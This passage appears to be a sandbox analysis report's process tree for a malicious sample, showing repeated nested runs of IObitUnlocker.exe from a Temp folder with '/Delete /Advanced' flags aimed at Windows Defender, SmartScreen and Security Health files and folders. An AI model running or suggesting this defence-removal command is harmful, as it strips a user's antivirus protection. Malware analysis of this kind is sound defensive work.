Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11968
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:12104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:11620
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:11820
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10292
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11872
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
